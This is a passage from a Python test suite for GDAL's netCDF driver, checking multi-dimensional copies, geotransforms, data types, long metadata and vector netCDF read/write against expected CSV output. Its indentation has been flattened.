ds = gdal.Open( ofile )
if ds is None:
gdaltest.post_reason( 'open of copy failed' )
return 'fail'
md = ds.GetMetadata( 'SUBDATASETS' )
subds_count = 0
if not md is None:
subds_count = len(md) / 2
if ds.RasterCount != 8 or subds_count != 0:
gdaltest.post_reason( 'copy has %d bands (expected 8) and has %d subdatasets'\
' (expected 0)' % (ds.RasterCount, subds_count ) )
return 'fail'
ds is None
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except:
print('NOTICE: ncdump not found')
return 'success'
if err == None or not 'netcdf library version' in err:
print('NOTICE: ncdump not found')
return 'success'
(ret, err) = gdaltest.runexternal_out_and_err( 'ncdump -h '+ ofile )
if ret == '' or err != '':
gdaltest.post_reason( 'ncdump failed' )
return 'fail'
# simple dimension tests using ncdump output
err = ""
if not 'int t(time, levelist, lat, lon) ;' in ret:
err = err + 'variable (t) has wrong dimensions or is missing\n'
if not 'levelist = 2 ;' in ret:
err = err + 'levelist dimension is missing or incorrect\n'
if not 'int levelist(levelist) ;' in ret:
err = err + 'levelist variable is missing or incorrect\n'
if not 'time = 4 ;' in ret:
err = err + 'time dimension is missing or incorrect\n'
if not 'double time(time) ;' in ret:
err = err + 'time variable is missing or incorrect\n'
# uncomment this to get full header in output
#if err != '':
# err = err + ret
if err != '':
gdaltest.post_reason( err )
return 'fail'
return 'success'
###############################################################################
# check support for writing multi-dimensional files using CreateCopy()
def netcdf_28():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/netcdf-4d.nc'
ofile = 'tmp/netcdf_28.nc'
# copy file
result = netcdf_test_copy( ifile, 0, None, ofile )
if result != 'success':
return 'fail'
# test file
return netcdf_test_4dfile( ofile )
###############################################################################
# Check support for writing multi-dimensional files using gdalwarp.
# Requires metadata copy support in gdalwarp (see bug #3898).
# First create a vrt file using gdalwarp, then copy file to netcdf.
# The workaround is (currently ??) necessary because dimension rolling code is
# in netCDFDataset::CreateCopy() and necessary dimension metadata
# is not saved to netcdf when using gdalwarp (as the driver does not write
# metadata to netcdf file with SetMetadata() and SetMetadataItem()).
def netcdf_29():
if gdaltest.netcdf_drv is None:
return 'skip'
# create tif file using gdalwarp
if test_cli_utilities.get_gdalwarp_path() is None:
gdaltest.post_reason('gdalwarp not found')
return 'skip'
ifile = 'data/netcdf-4d.nc'
ofile1 = 'tmp/netcdf_29.vrt'
ofile = 'tmp/netcdf_29.nc'
warp_cmd = '%s -q -overwrite -of vrt %s %s' %\
( test_cli_utilities.get_gdalwarp_path(), ifile, ofile1 )
try:
(ret, err) = gdaltest.runexternal_out_and_err( warp_cmd )
except:
gdaltest.post_reason('gdalwarp execution failed')
return 'fail'
if ( err != '' or ret != '' ):
gdaltest.post_reason('gdalwarp returned error\n'+str(ret)+' '+str(err))
return 'fail'
# copy vrt to netcdf, with proper dimension rolling
result = netcdf_test_copy( ofile1, 0, None, ofile )
if result != 'success':
return 'fail'
# test file
result = netcdf_test_4dfile( ofile )
if result == 'fail':
print('test failed - does gdalwarp support metadata copying?')
return result
###############################################################################
# check support for file with nan values (bug #4705)
def netcdf_30():
if gdaltest.netcdf_drv is None:
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF', 'trmm-nan.nc', 1, 62519 )
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
result = tst.testOpen()
gdal.PopErrorHandler()
return result
###############################################################################
#check if 2x2 file has proper geotransform
#1 pixel (in width or height) still unsupported because we can't get the pixel dimensions
def netcdf_31():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/trmm-2x2.nc' )
ds.GetProjection( )
gt = ds.GetGeoTransform( )
gt1 = ( -80.0, 0.25, 0.0, -19.5, 0.0, -0.25 )
if gt != gt1:
gdaltest.post_reason( 'Incorrect geotransform, got '+str(gt) )
return 'fail'
ds = None
return 'success'
###############################################################################
# Test NC_UBYTE write/read - netcdf-4 (FORMAT=NC4) only (#5053)
def netcdf_32():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
ifile = 'data/byte.tif'
ofile = 'tmp/netcdf_32.nc'
#gdal.SetConfigOption('CPL_DEBUG', 'ON')
# test basic read/write
result = netcdf_test_copy( ifile, 1, 4672, ofile, [ 'FORMAT=NC4' ] )
if result != 'success':
return 'fail'
result = netcdf_test_copy( ifile, 1, 4672, ofile, [ 'FORMAT=NC4C' ] )
if result != 'success':
return 'fail'
return 'success'
###############################################################################
# TEST NC_UBYTE metadata read - netcdf-4 (FORMAT=NC4) only (#5053)
def netcdf_33():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/nc_vars.nc'
ofile = 'tmp/netcdf_33.nc'
result = netcdf_test_copy( ifile, 1, None, ofile, [ 'FORMAT=NC4' ] )
if result != 'success':
return result
return netcdf_check_vars( 'tmp/netcdf_33.nc' )
###############################################################################
# check support for reading large file with chunking and DEFLATE compression
# if chunking is not supported within the netcdf driver, this test can take very long
def netcdf_34():
filename = 'utm-big-chunks.nc'
# this timeout is more than enough - on my system takes <1s with fix, about 25 seconds without
timeout = 5
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
if not gdaltest.run_slow_tests():
return 'skip'
try:
from multiprocessing import Process
except:
print('from multiprocessing import Process failed')
return 'skip'
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/netcdf/'+filename,filename):
return 'skip'
sys.stdout.write('.')
sys.stdout.flush()
tst = gdaltest.GDALTest( 'NetCDF', '../tmp/cache/'+filename, 1, 31621 )
#tst.testOpen()
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
proc = Process( target=tst.testOpen )
proc.start()
proc.join( timeout )
gdal.PopErrorHandler()
# if proc is alive after timeout we must terminate it, and return fail
# valgrind detects memory leaks when this occurs (although it should never happen)
if proc.is_alive():
proc.terminate()
print('testOpen() for file %s has reached timeout limit of %d seconds' % (filename, timeout) )
return 'fail'
return 'success'
###############################################################################
# test writing a long metadata > 8196 chars (bug #5113)
def netcdf_35():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/netcdf_fixes.nc'
ofile = 'tmp/netcdf_35.nc'
# copy file
result = netcdf_test_copy( ifile, 0, None, ofile )
if result != 'success':
return 'fail'
# test long metadata is copied correctly
ds = gdal.Open( ofile )
if ds is None:
gdaltest.post_reason( 'open of copy failed' )
return 'fail'
md = ds.GetMetadata( '' )
if not 'U#bla' in md:
gdaltest.post_reason( 'U#bla metadata absent' )
return 'fail'
bla = md['U#bla']
if not len(bla) == 9591:
gdaltest.post_reason( 'U#bla metadata is of length %d, expecting %d' % (len(bla),9591) )
return 'fail'
if not bla[-4:] == '_bla':
gdaltest.post_reason( 'U#bla metadata ends with [%s], expecting [%s]' % (bla[-4:], '_bla') )
return 'fail'
return 'success'
###############################################################################
# test for correct geotransform (bug #5114)
def netcdf_36():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/netcdf_fixes.nc'
ds = gdal.Open( ifile )
if ds is None:
gdaltest.post_reason( 'open failed' )
return 'fail'
gt = ds.GetGeoTransform( )
if gt is None:
gdaltest.post_reason( 'got no GeoTransform' )
return 'fail'
gt_expected = (-3.498749944898817, 0.0025000042385525173, 0.0, 46.61749818589952, 0.0, -0.001666598849826389)
if gt != gt_expected:
gdaltest.post_reason( 'got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)) )
return 'fail'
return 'success'
###############################################################################
# test for reading gaussian grid (bugs #4513 and #5118)
def netcdf_37():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/reduce-cgcms.nc'
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
ds = gdal.Open( ifile )
gdal.PopErrorHandler()
if ds is None:
gdaltest.post_reason( 'open failed' )
return 'fail'
gt = ds.GetGeoTransform( )
if gt is None:
gdaltest.post_reason( 'got no GeoTransform' )
return 'fail'
gt_expected = (-1.875, 3.75, 0.0, 89.01354337620016, 0.0, -3.7088976406750063)
if gt != gt_expected:
gdaltest.post_reason( 'got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)) )
return 'fail'
md = ds.GetMetadata( 'GEOLOCATION2' )
if not md or not 'Y_VALUES' in md:
gdaltest.post_reason( 'did not get 1D geolocation' )
return 'fail'
y_vals = md['Y_VALUES']
if not y_vals.startswith('{-87.15909455586265,-83.47893666931698,') \
or not y_vals.endswith(',83.47893666931698,87.15909455586265}'):
gdaltest.post_reason( 'got incorrect values in 1D geolocation' )
return 'fail'
return 'success'
###############################################################################
# test for correct geotransform of projected data in km units (bug #5118)
def netcdf_38():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/bug5118.nc'
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
ds = gdal.Open( ifile )
gdal.PopErrorHandler()
if ds is None:
gdaltest.post_reason( 'open failed' )
return 'fail'
gt = ds.GetGeoTransform( )
if gt is None:
gdaltest.post_reason( 'got no GeoTransform' )
return 'fail'
gt_expected = (-1659.3478178136488, 13.545000861672793, 0.0, 2330.054725283668, 0.0, -13.54499744233631)
if gt != gt_expected:
gdaltest.post_reason( 'got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)) )
return 'fail'
return 'success'
###############################################################################
# Test VRT and NETCDF:
def netcdf_39():
if gdaltest.netcdf_drv is None:
return 'skip'
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:tmp/two_vars_scale_offset.nc:z')
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
if cs != 65463:
gdaltest.post_reason('failure')
print(cs)
return 'fail'
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:"tmp/two_vars_scale_offset.nc":z')
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
if cs != 65463:
gdaltest.post_reason('failure')
print(cs)
return 'fail'
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:"%s/tmp/two_vars_scale_offset.nc":z' % os.getcwd())
out_ds = gdal.GetDriverByName('VRT').CreateCopy('%s/tmp/netcdf_39.vrt' % os.getcwd(), src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
if cs != 65463:
gdaltest.post_reason('failure')
print(cs)
return 'fail'
src_ds = gdal.Open('NETCDF:"%s/data/two_vars_scale_offset.nc":z' % os.getcwd())
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
del out_ds
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/netcdf_39.vrt')
if cs != 65463:
gdaltest.post_reason('failure')
print(cs)
return 'fail'
return 'success'
###############################################################################
# Check support of reading of chunked bottom-up files.
def netcdf_40():
if gdaltest.netcdf_drv is None or not gdaltest.netcdf_drv_has_nc4:
return 'skip'
return netcdf_test_copy( 'data/bug5291.nc', 0, None, 'tmp/netcdf_40.nc' )
###############################################################################
# Test support for georeferenced file without CF convention
def netcdf_41():
if gdaltest.netcdf_drv is None:
return 'skip'
with gdaltest.error_handler():
ds = gdal.Open('data/byte_no_cf.nc')
if ds.GetGeoTransform() != (440720, 60, 0, 3751320, 0, -60):
gdaltest.post_reason('failure')
print(ds.GetGeoTransform())
return 'fail'
if ds.GetProjectionRef().find('26711') < 0:
gdaltest.post_reason('failure')
print(ds.GetGeoTransform())
return 'fail'
return 'success'
###############################################################################
# Test writing & reading GEOLOCATION array
def netcdf_42():
if gdaltest.netcdf_drv is None:
return 'skip'
src_ds = gdal.GetDriverByName('MEM').Create('', 60, 39, 1)
src_ds.SetMetadata( [
'LINE_OFFSET=0',
'LINE_STEP=1',
'PIXEL_OFFSET=0',
'PIXEL_STEP=1',
'SRS=GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9108"]],AXIS["Lat",NORTH],AXIS["Long",EAST],AUTHORITY["EPSG","4326"]]',
'X_BAND=1',
'X_DATASET=../gcore/data/sstgeo.tif',
'Y_BAND=2',
'Y_DATASET=../gcore/data/sstgeo.tif'], 'GEOLOCATION' )
sr = osr.SpatialReference()
sr.ImportFromEPSG(32631)
src_ds.SetProjection(sr.ExportToWkt())
gdaltest.netcdf_drv.CreateCopy('tmp/netcdf_42.nc', src_ds)
ds = gdal.Open('tmp/netcdf_42.nc')
if ds.GetMetadata('GEOLOCATION') != {
'LINE_OFFSET': '0',
'X_DATASET': 'NETCDF:"tmp/netcdf_42.nc":lon',
'PIXEL_STEP': '1',
'SRS': 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]',
'PIXEL_OFFSET': '0',
'X_BAND': '1',
'LINE_STEP': '1',
'Y_DATASET': 'NETCDF:"tmp/netcdf_42.nc":lat',
'Y_BAND': '1'}:
gdaltest.post_reason('failure')
print(ds.GetMetadata('GEOLOCATION'))
return 'fail'
ds = gdal.Open('NETCDF:"tmp/netcdf_42.nc":lon')
if ds.GetRasterBand(1).Checksum() != 36043:
gdaltest.post_reason('failure')
print(ds.GetRasterBand(1).Checksum())
return 'fail'
ds = gdal.Open('NETCDF:"tmp/netcdf_42.nc":lat')
if ds.GetRasterBand(1).Checksum() != 33501:
gdaltest.post_reason('failure')
print(ds.GetRasterBand(1).Checksum())
return 'fail'
return 'success'
###############################################################################
# Test reading GEOLOCATION array from geotransform (non default)
def netcdf_43():
if gdaltest.netcdf_drv is None:
return 'skip'
src_ds = gdal.Open('data/byte.tif')
gdaltest.netcdf_drv.CreateCopy('tmp/netcdf_43.nc', src_ds, options = ['WRITE_LONLAT=YES'] )
ds = gdal.Open('tmp/netcdf_43.nc')
if ds.GetMetadata('GEOLOCATION') != {
'LINE_OFFSET': '0',
'X_DATASET': 'NETCDF:"tmp/netcdf_43.nc":lon',
'PIXEL_STEP': '1',
'SRS': 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]',
'PIXEL_OFFSET': '0',
'X_BAND': '1',
'LINE_STEP': '1',
'Y_DATASET': 'NETCDF:"tmp/netcdf_43.nc":lat',
'Y_BAND': '1'}:
gdaltest.post_reason('failure')
print(ds.GetMetadata('GEOLOCATION'))
return 'fail'
return 'success'
###############################################################################
# Test NC_USHORT/UINT read/write - netcdf-4 only (#6337)
def netcdf_44():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
for f, md5 in ('data/ushort.nc', 18), ('data/uint.nc', 10):
if (netcdf_test_copy( f, 1, md5, 'tmp/netcdf_44.nc', [ 'FORMAT=NC4' ] )
!= 'success'):
return 'fail'
return 'success'
###############################################################################
# Test reading a vector NetCDF 3 file
def netcdf_45():
if gdaltest.netcdf_drv is None:
return 'skip'
# Test that a vector cannot be opened in raster-only mode
ds = gdal.OpenEx( 'data/test_ogr_nc3.nc', gdal.OF_RASTER )
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
# Test that a raster cannot be opened in vector-only mode
ds = gdal.OpenEx( 'data/cf-bug636.nc', gdal.OF_VECTOR )
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
ds = gdal.OpenEx( 'data/test_ogr_nc3.nc', gdal.OF_VECTOR )
with gdaltest.error_handler():
gdal.VectorTranslate( '/vsimem/netcdf_45.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT'] )
fp = gdal.VSIFOpenL( '/vsimem/netcdf_45.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT (1 2)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
fp = gdal.VSIFOpenL( '/vsimem/netcdf_45.csvt', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
gdal.Unlink('/vsimem/netcdf_45.csv')
gdal.Unlink('/vsimem/netcdf_45.csvt')
gdal.Unlink('/vsimem/netcdf_45.prj')
return 'success'
###############################################################################
# Test reading a vector NetCDF 3 file
def netcdf_46():
if gdaltest.netcdf_drv is None:
return 'skip'
if test_cli_utilities.get_test_ogrsf_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_test_ogrsf_path() + ' -ro data/test_ogr_nc3.nc')
if ret.find('INFO') == -1 or ret.find('ERROR') != -1:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test reading a vector NetCDF 4 file
def netcdf_47():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
# Test that a vector cannot be opened in raster-only mode
with gdaltest.error_handler():
ds = gdal.OpenEx( 'data/test_ogr_nc4.nc', gdal.OF_RASTER )
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
ds = gdal.OpenEx( 'data/test_ogr_nc4.nc', gdal.OF_VECTOR )
with gdaltest.error_handler():
gdal.VectorTranslate( '/vsimem/netcdf_47.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT'] )
fp = gdal.VSIFOpenL( '/vsimem/netcdf_47.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string3chars,twodimstringchar,date,datetime,datetime_explicit_fillValue,int64,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field,ubyte_field,ubyte_field_explicit_fillValue,ushort_field,ushort_field_explicit_fillValue,uint_field,uint_field_explicit_fillValue,uint64_field,uint64_field_explicit_fillValue
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,,1,1,1.2,1.2,123,12,5,-125,254,255,65534,65535,4000000000,4294967295,1234567890123,
"POINT (1 2)",,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
fp = gdal.VSIFOpenL( '/vsimem/netcdf_47.csvt', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer,Integer,Integer,Integer,Integer,Integer64,Integer64,Real,Real
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
gdal.Unlink('/vsimem/netcdf_47.csv')
gdal.Unlink('/vsimem/netcdf_47.csvt')
gdal.Unlink('/vsimem/netcdf_47.prj')
return 'success'
###############################################################################
# Test reading a vector NetCDF 3 file without any geometry
def netcdf_48():
if gdaltest.netcdf_drv is None:
return 'skip'
with gdaltest.error_handler():
ds = gdal.OpenEx( 'data/test_ogr_no_xyz_var.nc', gdal.OF_VECTOR )
lyr = ds.GetLayer(0)
if lyr.GetGeomType() != ogr.wkbNone:
gdaltest.post_reason('failure')
return 'fail'
f = lyr.GetNextFeature()
if f['int32'] != 1:
gdaltest.post_reason('failure')
return 'fail'
return 'success'
###############################################################################
# Test reading a vector NetCDF 3 file with X,Y,Z vars as float
def netcdf_49():
if gdaltest.netcdf_drv is None:
return 'skip'
with gdaltest.error_handler():
ds = gdal.OpenEx( 'data/test_ogr_xyz_float.nc', gdal.OF_VECTOR )
gdal.VectorTranslate( '/vsimem/netcdf_49.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
fp = gdal.VSIFOpenL( '/vsimem/netcdf_49.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32
"POINT Z (1 2 3)",1
"POINT (1 2)",
,,
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
gdal.Unlink('/vsimem/netcdf_49.csv')
return 'success'
###############################################################################
# Test creating a vector NetCDF 3 file with WKT geometry field
def netcdf_50():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.OpenEx( '../ogr/data/poly.shp', gdal.OF_VECTOR )
out_ds = gdal.VectorTranslate( 'tmp/netcdf_50.nc', ds, format = 'netCDF', layerCreationOptions = [ 'WKT_DEFAULT_WIDTH=1'] )
src_lyr = ds.GetLayer(0)
src_lyr.ResetReading()
out_lyr = out_ds.GetLayer(0)
out_lyr.ResetReading()
src_f = src_lyr.GetNextFeature()
out_f = out_lyr.GetNextFeature()
src_f.SetFID(-1)
out_f.SetFID(-1)
src_json = src_f.ExportToJson()
out_json = out_f.ExportToJson()
if src_json != out_json:
gdaltest.post_reason('failure')
print(src_json)
print(out_json)
return 'fail'
out_ds = None
out_ds = gdal.OpenEx( 'tmp/netcdf_50.nc', gdal.OF_VECTOR )
out_lyr = out_ds.GetLayer(0)
srs = out_lyr.GetSpatialRef().ExportToWkt()
if srs.find('PROJCS["OSGB 1936') < 0:
gdaltest.post_reason('failure')
print(srs)
return 'fail'
out_f = out_lyr.GetNextFeature()
out_f.SetFID(-1)
out_json = out_f.ExportToJson()
if src_json != out_json:
gdaltest.post_reason('failure')
print(src_json)
print(out_json)
return 'fail'
out_ds = None
gdal.Unlink('tmp/netcdf_50.nc')
return 'success'
###############################################################################
# Test creating a vector NetCDF 3 file with X,Y,Z fields
def netcdf_51():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.OpenEx( 'data/test_ogr_nc3.nc', gdal.OF_VECTOR )
# Test autogrow of string fields
gdal.VectorTranslate( 'tmp/netcdf_51.nc', ds, format = 'netCDF', layerCreationOptions = [ 'STRING_DEFAULT_WIDTH=1'] )
with gdaltest.error_handler():
ds = gdal.OpenEx( 'tmp/netcdf_51.nc', gdal.OF_VECTOR )
gdal.VectorTranslate( '/vsimem/netcdf_51.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT'] )
ds = None
fp = gdal.VSIFOpenL( '/vsimem/netcdf_51.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
fp = gdal.VSIFOpenL( '/vsimem/netcdf_51.csvt', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
ds = gdal.OpenEx( 'tmp/netcdf_51.nc', gdal.OF_VECTOR | gdal.OF_UPDATE )
lyr = ds.GetLayer(0)
lyr.CreateField( ogr.FieldDefn('extra', ogr.OFTInteger) )
lyr.CreateField( ogr.FieldDefn('extra_str', ogr.OFTString) )
f = lyr.GetNextFeature()
if f is None:
gdaltest.post_reason('failure')
return 'fail'
f['extra'] = 5
f['extra_str'] = 'foobar'
if lyr.CreateFeature(f) != 0:
gdaltest.post_reason('failure')
return 'fail'
ds = None
ds = gdal.OpenEx( 'tmp/netcdf_51.nc', gdal.OF_VECTOR )
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
if f['int32'] != 1 or f['extra'] != 5 or f['extra_str'] != 'foobar':
gdaltest.post_reason('failure')
return 'fail'
f = None
ds = None
import netcdf_cf
if netcdf_cf.netcdf_cf_setup() == 'success' and \
gdaltest.netcdf_cf_method is not None:
result_cf = netcdf_cf.netcdf_cf_check_file( 'tmp/netcdf_51.nc','auto',False )
if result_cf != 'success':
gdaltest.post_reason('failure')
return 'fail'
gdal.Unlink('tmp/netcdf_51.nc')
gdal.Unlink('tmp/netcdf_51.csv')
gdal.Unlink('tmp/netcdf_51.csvt')
gdal.Unlink('/vsimem/netcdf_51.csv')
gdal.Unlink('/vsimem/netcdf_51.csvt')
gdal.Unlink('/vsimem/netcdf_51.prj')
return 'success'
###############################################################################
# Test creating a vector NetCDF 3 file with X,Y,Z fields with WRITE_GDAL_TAGS=NO
def netcdf_51_no_gdal_tags():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.OpenEx( 'data/test_ogr_nc3.nc', gdal.OF_VECTOR )
gdal.VectorTranslate( 'tmp/netcdf_51_no_gdal_tags.nc', ds, format = 'netCDF', datasetCreationOptions = [ 'WRITE_GDAL_TAGS=NO'] )
with gdaltest.error_handler():
ds = gdal.OpenEx( 'tmp/netcdf_51_no_gdal_tags.nc', gdal.OF_VECTOR )
gdal.VectorTranslate( '/vsimem/netcdf_51_no_gdal_tags.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT'] )
ds = None
fp = gdal.VSIFOpenL( '/vsimem/netcdf_51_no_gdal_tags.csv', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x1,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
if content != expected_content:
gdaltest.post_reason('failure')
print(content)
return 'fail'
fp = gdal.VSIFOpenL( '/vsimem/netcdf_51_no_gdal_tags.csvt', 'rb' )
if fp is not None:
content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
gdal.VSIFCloseL(fp)
